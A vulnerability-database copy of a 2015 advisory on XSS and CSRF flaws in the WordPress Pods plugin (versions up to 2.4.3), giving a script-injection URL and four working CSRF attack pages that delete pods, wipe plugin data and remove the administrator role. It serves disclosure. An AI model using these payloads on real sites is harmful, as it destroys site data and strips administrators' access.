Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31637
HistoryJan 19, 2015 - 12:00 a.m.

Wordpress plugin Pods <= 2.4.3 XSS and CSRF vulnerabilities

2015-01-1900:00:00
vulners.com
25
JSON

Vulnerability title: Wordpress plugin Pods <= 2.4.3 XSS and CSRF vulnerabilities
vulnerabilities
Author: Pietro Oliva
CVE: CVE-2014-7956, CVE-2014-7957
Product: pods
Affected version: pods <= 2.4.3
Vulnerabilities fixed in version: 2.5

XSS vulnerability (CVE-2014-7956, authentication is needed):
http://localhost/wp-admin/admin.php?page=pods&amp;action=edit&amp;id=4&quot;&gt;&lt;/a&gt;&lt;script&gt;alert&#40;&#39;xss&#39;&#41;&lt;/script&gt;&lt;!--

Multiple CSRF (CVE-2014-7957,authentication needed):

CSRF 1 (bruteforce pods IDs and delete them):

<html>
<body>
<script>
target="http://localhost";
for (i=0; i<50;i++)
document.write('<img style="display:none"
src="'+target+'/wp-admin/admin.php?page=pods&action=delete&id='+i+'">');
</script>
</body>
</html>

CSRF 2 (delete pods plugin data):

<html>
<body onload="document.forms[0].submit();">
<form method="post"
action="http://localhost/wordpress/wp-admin/admin.php?page=pods-settings&amp;tab=reset&quot;&gt;
<input type="hidden" name="pods_reset" value="Reset Pods settings and data ">
</form>
</html>

CSRF 3 (deactivate pods and delete data):

<html>
<body onload="document.forms[0].submit();">
<form method="post"
action="http://localhost/wordpress/wp-admin/admin.php?page=pods-settings&amp;tab=reset&amp;pods_reset_deactivate=
Deactivate and Delete Pods data ">
<input type="hidden" name="pods_reset_deactivate" value=" Deactivate
and Delete Pods data ">
</form>
</html>

CSRF 4 (enable "roles and capabilities" component and delete admin role):

<html>
<script>
function continueExecution(){
document.write('<link rel="stylesheet"
href="http://localhost/wordpress/wp-admin/admin.php?page=pods-component-roles-and-capabilities&amp;action=delete&amp;id=administrator&quot;&gt;&#39;&#41;;
}
document.write('<link rel="stylesheet"
href="http://localhost/wordpress/wp-admin/admin.php?page=pods-components&amp;action=toggle&amp;id=roles-and-capabilities&amp;toggle=1&amp;toggled=1&quot;&gt;&#39;&#41;;
setTimeout(continueExecution, 10000);
</script>
</html>

CSRF 4 XSS impact:

http://localhost/wp-admin/admin.php?page=pods-components&amp;action=toggle&amp;id=roles-and-capabilities&amp;toggle=1&amp;toggled=111111111&quot;
onmouseenter="alert('xss')"
style="width:3000px;height:1000px;left:0px;top:0px;position:absolute;opacity:0;"></a><!–

Related

packetstorm 1
wpvulndb 1
cve 2
patchstack 2
prion 2
securityvulns 1
packetstorm
packetstorm
WordPress Pods 2.4.3 CSRF / Cross Site Scripting
2015-01-12 00:00:00
wpvulndb
wpvulndb
Pods <= 2.4.3 - Authenticated XSS & CSRF
2015-01-12 09:08:48
cve
cve
CVE-2014-7956
2015-01-15 15:59:00
CVE-2014-7957
2015-01-15 15:59:00
patchstack
patchstack
WordPress Pods Plugin <= 2.4 - XSS
2014-10-07 00:00:00
WordPress Pods Plugin <= 2.4 - Multiple CSRF
2014-10-07 00:00:00
prion
prion
Cross site scripting
2015-01-15 15:59:00
Cross site request forgery (csrf)
2015-01-15 15:59:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-01-19 00:00:00
JSON
Related for SECURITYVULNS:DOC:31637
packetstorm1wpvulndb1cve2patchstack2prion2securityvulns1